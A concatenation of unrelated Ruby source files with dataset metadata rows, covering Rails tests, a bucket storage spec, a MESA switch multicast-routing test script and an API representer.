Router.access_token(*args)
end
def self.access_token_from_request(*args)
Router.access_token_from_request(*args)
end
end
end
end
| 28.992701 | 72 | 0.611531 |
016f263c75f5e64f4fe4ed40708759c5cc360d3e | 205 | require File.dirname(__FILE__) + '/../test_helper'
class UserTest < ActiveSupport::TestCase
def test_create
User.create(:username => 'tuxedo', :name => 'Mr. Tuxedo', :password =>'cat')
end
end
| 22.777778 | 80 | 0.673171 |
1c73081e7abe1473c60b7454a8e4c85dafb72e32 | 4,336 | RSpec.shared_examples 'a bucket' do |features|
features ||= {}
before do
subject.write '/a/b.txt', 'TESTDATA-b'
subject.write 'a/b/c.txt', 'TESTDATA-c',
content_type: 'text/plain',
metadata: { 'meta-KEY' => 'VaLuE' }
subject.write 'a/b/c/d.txt', 'TESTDATA-d'
subject.write 'a/b/c/d/e.txt', 'TESTDATA-e'
end
def be_recent_time
be_within(90).of(Time.now)
end
after do
subject.close
end
it 'lists' do
expect(subject.ls).to be_a(Enumerator)
expect(subject.ls.to_a).to match_array [
'a/b.txt',
'a/b/c.txt',
'a/b/c/d.txt',
'a/b/c/d/e.txt',
]
expect(subject.ls('**/c*').to_a).to match_array [
'a/b/c.txt',
]
expect(subject.ls('a/b/*/*').to_a).to match_array [
'a/b/c/d.txt',
]
expect(subject.ls('x/**').to_a).to be_empty
end
it 'globs' do
expect(subject.glob).to be_a(Enumerator)
expect(subject.glob.to_a.sort_by(&:path)).to match [
include(path: 'a/b.txt', size: 10, mtime: be_recent_time),
include(path: 'a/b/c.txt', size: 10, mtime: be_recent_time),
include(path: 'a/b/c/d.txt', size: 10, mtime: be_recent_time),
include(path: 'a/b/c/d/e.txt', size: 10, mtime: be_recent_time),
]
expect(subject.glob('**/c*').to_a).to match [
include(path: 'a/b/c.txt', size: 10, mtime: be_recent_time),
]
expect(subject.glob('a/b/*/*').to_a).to match [
include(path: 'a/b/c/d.txt', size: 10, mtime: be_recent_time),
]
expect(subject.glob('x/**').to_a).to be_empty
end
it 'returns info' do
info = subject.info('/a/b/c.txt')
expect(info.path).to eq('a/b/c.txt')
expect(info.size).to eq(10)
expect(info.mtime).to be_recent_time
expect(info.content_type).to eq('text/plain') unless features[:content_type] == false
expect(info.metadata).to eq('Meta-Key' => 'VaLuE') unless features[:metadata] == false
expect { subject.info('missing.txt') }.to raise_error(BFS::FileNotFound)
expect { subject.info('/a/b') }.to raise_error(BFS::FileNotFound)
end
it 'write/reads' do
expect(subject.read('a/b.txt')).to eq('TESTDATA-b')
expect(subject.read('/a/b.txt')).to eq('TESTDATA-b')
subject.write('a/b.txt', 'NEWDATA')
data = subject.read('a/b.txt')
expect(data).to eq('NEWDATA')
expect(data.encoding).to eq(Encoding.default_external)
end
it 'write/reads (block)' do
subject.create('x.txt') {|io| io.write 'DATA-x' }
read = nil
subject.open('x.txt') {|io| read = io.gets }
expect(read).to eq('DATA-x')
end
it 'write/reads (iterative)' do
w = subject.create('y.txt')
w.write('DATA-y')
w.commit
r = subject.open('y.txt')
expect(r.read).to eq('DATA-y')
r.close
end
it 'write/reads (custom encoding + perm)' do
w = subject.create('y.txt', encoding: 'iso-8859-15', perm: 0o644)
w.write('DATA-y')
w.commit
r = subject.open('y.txt', encoding: 'iso-8859-15')
data = r.read
expect(data).to eq('DATA-y')
expect(data.encoding).to eq(Encoding::ISO_8859_15)
r.close
info = subject.info('y.txt')
expect(info.mode).to eq(0).or eq(0o644)
end
it 'raises FileNotFound if not found on read' do
expect { subject.read('not/found.txt') }.to raise_error(BFS::FileNotFound)
end
it 'gracefully aborts on errors' do
expect do
subject.create('x.txt') do |io|
io.write 'TESTDATA'
raise 'doh!'
end
end.to raise_error(RuntimeError, 'doh!')
expect { subject.read('x.txt') }.to raise_error(BFS::FileNotFound)
end
it 'removes' do
subject.rm('a/b/c.txt')
subject.rm('not/found.txt')
expect(subject.ls).to match_array [
'a/b.txt',
'a/b/c/d.txt',
'a/b/c/d/e.txt',
]
end
it 'copies' do
subject.cp('a/b/c.txt', 'x.txt')
expect(subject.ls.count).to eq(5)
expect(subject.read('x.txt')).to eq('TESTDATA-c')
expect { subject.cp('missing.txt', 'x.txt') }.to raise_error(BFS::FileNotFound)
end
it 'moves' do
subject.mv('a/b/c.txt', 'x.txt')
expect(subject.ls.count).to eq(4)
expect(subject.read('x.txt')).to eq('TESTDATA-c')
expect { subject.read('a/b/c.txt') }.to raise_error(BFS::FileNotFound)
expect { subject.mv('missing.txt', 'x.txt') }.to raise_error(BFS::FileNotFound)
end
end
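# A minimal sketch of how a backend spec might include this shared example group
# (the in-memory bucket class and its constructor are illustrative assumptions):
#
#   RSpec.describe BFS::Bucket::InMem do
#     subject { described_class.new }
#
#     it_behaves_like 'a bucket'
#     # or, for a backend without content-type/metadata support:
#     # it_behaves_like 'a bucket', content_type: false, metadata: false
#   end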
| 28.526316 | 90 | 0.604935 |
38f3f65767501491592b4acbd5265a20d7833193 | 7,464 | #!/usr/bin/env ruby
# Copyright (c) 2004-2020 Microchip Technology Inc. and its subsidiaries.
# SPDX-License-Identifier: MIT
require_relative 'libeasy/et'
require_relative 'libeasy/utils'
$ts = get_test_setup("mesa_pc_b2b_4x")
#---------- Capabilities -----------------------------------------------------
cap_check_exit("L3")
#---------- Test parameters ----------------------------------------------------
$router_mac = "00:01:02:03:04:05"
$conf_table =
[
{
vid: 2,
sip: "10.1.1.1",
mcast: "230.1.1.1",
ipv6_sip: "01::1:1",
ipv6_mcast: "ff00::0102:0304",
rt_rpf: false,
},
{
vid: 3,
sip: "20.1.1.1",
mcast: "230.1.1.2",
ipv6_sip: "02::2:2",
ipv6_mcast: "ff00::0102:0305",
rt_rpf: true,
},
{
vid: 4,
},
]
$frame_table =
[
{
tx_port: 1,
dmac: "33:33:01:02:03:01",
vid: 3,
sip: "01::1:1",
mcast: "ff00::0102:0304",
expect_rx: true
},
{
tx_port: 1,
dmac: "33:33:01:02:03:01",
vid: 3,
sip: "02::2:2",
mcast: "ff00::0102:0305",
expect_rx: true
},
{
tx_port: 2,
dmac: "33:33:01:02:03:01",
vid: 4,
sip: "01::1:1",
mcast: "ff00::0102:0304",
expect_rx: true
},
{
tx_port: 2,
dmac: "33:33:01:02:03:01",
vid: 4,
sip: "02::2:2",
mcast: "ff00::0102:0305",
expect_rx: false # false because RPF is enabled
},
{
tx_port: 1,
dmac: "01:00:5e:01:01:01",
vid: 3,
sip: "10.1.1.1",
mcast: "230.1.1.1",
expect_rx: true
},
{
tx_port: 1,
dmac: "01:00:5e:01:01:01",
vid: 3,
sip: "20.1.1.1",
mcast: "230.1.1.2",
expect_rx: true
},
{
tx_port: 2,
dmac: "01:00:5e:01:01:01",
vid: 4,
sip: "10.1.1.1",
mcast: "230.1.1.1",
expect_rx: true
},
{
tx_port: 2,
dmac: "01:00:5e:01:01:01",
vid: 4,
sip: "20.1.1.1",
mcast: "230.1.1.2",
expect_rx: false # false because RPF is enabled
},
]
#---------- Configuration -----------------------------------------------------
$rleg_vid = []
$mc_conf = []
#$ts.dut.run "mesa-cmd deb trace api_ail l3 info"
test "l3-mc-conf" do
$conf_table.each_with_index do |e, idx|
test "Set VLAN port configuration" do
port = $ts.dut.p[idx]
pvid = e[:vid]
conf = $ts.dut.call "mesa_vlan_port_conf_get", port
conf["pvid"] = pvid
conf["untagged_vid"] = pvid
conf["port_type"] = "MESA_VLAN_PORT_TYPE_UNAWARE"
$ts.dut.call "mesa_vlan_port_conf_set", port, conf
end
test "Set VLAN memberships" do
$ts.dut.call "mesa_vlan_port_members_set", e[:vid], "#{$ts.dut.port_list[idx]}"
end
end
# Enable routing and setup router MAC address
rt_mac = $router_mac.split(":")
rt_mac.each_with_index{|val, index | rt_mac[index] = val.to_i}
conf = {
rleg_mode: "MESA_ROUTING_RLEG_MAC_MODE_SINGLE",
base_address: {addr: rt_mac},
routing_enable: false,
mc_routing_enable: true
}
$ts.dut.call "mesa_l3_common_set", conf
test "Add router legs" do
$conf_table.each_with_index do |e, idx|
conf = {
rleg_enable: false,
rleg_id: 0,
ipv4_unicast_enable: false,
ipv6_unicast_enable: false,
ipv4_multicast_enable: true,
ipv6_multicast_enable: true,
ipv4_icmp_redirect_enable: false,
ipv6_icmp_redirect_enable: false,
vlan: e[:vid],
vrid0_enable: false,
vrid0: 0,
vrid1_enable: false,
vrid1: 0,
mc_ttl_limit_enable: false,
mc_ttl_limit: 0
}
$ts.dut.call "mesa_l3_rleg_add", conf
$rleg_vid << e[:vid]
end
end
test "Add multicast routes" do
["v4", "v6"].each {|ver|
$conf_table.each_with_index do |e, idx|
if !e.key?(:sip)
next
end
if ver == "v6" && !e.key?(:ipv6_sip)
next
end
if ver == "v4"
ip_src = IPAddr.new(e[:sip]).to_i
ip_mcast = IPAddr.new(e[:mcast]).to_i
ipv4_mc = {
source: ip_src,
group: ip_mcast
}
else
sip = ipv6_str2arr(e[:ipv6_sip])
dip = ipv6_str2arr(e[:ipv6_mcast])
ipv6_mc = {
source: ip_src = { addr: sip },
group: ip_mcast = { addr: dip }
}
end
if e[:rt_rpf]
src_rleg = e[:vid]
else
src_rleg = 0
end
conf = {}
if ver == "v4"
conf = {
type: false,
route: {
ipv4_mc: ipv4_mc,
},
source_rleg: src_rleg
}
else
conf = {
type: true,
route: {
ipv6_mc: ipv6_mc,
},
source_rleg: src_rleg
}
end
$ts.dut.call "mesa_l3_mc_route_add", conf
$ts.dut.call "mesa_l3_mc_route_rleg_add", conf, $conf_table[0][:vid]
if !$mc_conf.include? conf
$mc_conf << conf
end
end
}
end # test mc_conf
end
#---------- Frame testing -----------------------------------------------------
test "mc-frame-routing-io" do
# Tx frames from ports 1 and 2 and check reception on port 0; frames failing the RPF check must not be forwarded
$frame_table.each_with_index do |e, idx_tx|
ip = "ipv4"
et = "0x0800"
ttl = "ttl"
if e[:dmac].include? "33:33"
ip = "ipv6"
et = "0x86dd"
ttl = "hlim"
end
idx_tx = e[:tx_port]
tx_dmac = e[:dmac]
tx_smac = idx_tx + 1
tx_ip_src = e[:sip]
tx_ip_dst = e[:mcast]
vid = e[:vid]
ttl_tx = 64
ttl_rx = ttl_tx - 1
cmd = "sudo ef name f#{idx_tx} eth dmac #{tx_dmac} smac #{tx_smac} "
cmd += "et #{et} #{ip} sip #{tx_ip_src} dip #{tx_ip_dst} #{ttl} #{ttl_tx} "
cmd += "tx #{$ts.pc.p[idx_tx]} name f#{idx_tx} "
idx_rx = 0
cmd += "name f#{idx_rx} eth dmac #{tx_dmac} smac #{$router_mac} et #{et} "
cmd += "#{ip} sip #{tx_ip_src} dip #{tx_ip_dst} #{ttl} #{ttl_rx} "
if e[:expect_rx]
cmd += "rx #{$ts.pc.p[idx_rx]} name f#{idx_rx}"
else
cmd += "rx #{$ts.pc.p[idx_rx]}"
end
$ts.pc.try cmd
end
end
$mc_conf.each do |rt, vid|
active = $ts.dut.call "mesa_l3_mc_route_active_get", rt
if !active
t_e "Route was not hit??"
end
active = $ts.dut.call "mesa_l3_mc_route_active_get", rt
if active
t_e "Route hit should be cleared hit??"
end
end
#---------- Cleanup -----------------------------------------------------
$mc_conf.each do |rt, vid|
$ts.dut.call "mesa_l3_mc_route_del", rt
end
$rleg_vid.each do |vid|
$ts.dut.call "mesa_l3_rleg_del", vid
end
| 27.240876 | 91 | 0.456994 |
79e5c3b1fae948ff440283c50c552afc52029b33 | 918 | require 'rails_helper'
describe "When I visit the measurement_type New page" do
let(:user) { create(:user, role: "admin") }
before do
sign_in user
end
it "Then I see the measurement_type form" do
visit new_measurement_type_path
expect(page).to have_content("New Measurement Type")
expect(page).to have_content("Name")
expect(page).to have_content("Unit")
end
it "I can create a new measurement_type" do
visit new_measurement_type_path
fill_in('Name', with: "Length")
fill_in('Unit', with: "cm")
click_button('Submit')
expect(page).to have_content("Length")
expect(page).to have_content("cm")
end
context "As a non-admin user" do
it "Then I should not have access to the measurement types action form" do
user.update(role: "user")
visit new_measurement_type_path
expect(page).to have_content 'Not authorized'
end
end
end
| 23.538462 | 78 | 0.691721 |
5d4410e4c0f411c6c83b689999697bf7d29e7d41 | 1,107 | ##########################################################################
# Copyright 2016 ThoughtWorks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
module ApiV1
class CommandSnippetsRepresenter < ApiV1::BaseRepresenter
link :self do |opts|
opts[:url_builder].apiv1_admin_internal_command_snippets_url(:prefix => opts[:prefix])
end
collection :command_snippets, embedded: true, exec_context: :decorator, decorator: CommandSnippetRepresenter
def command_snippets
represented
end
end
end | 38.172414 | 112 | 0.65673 |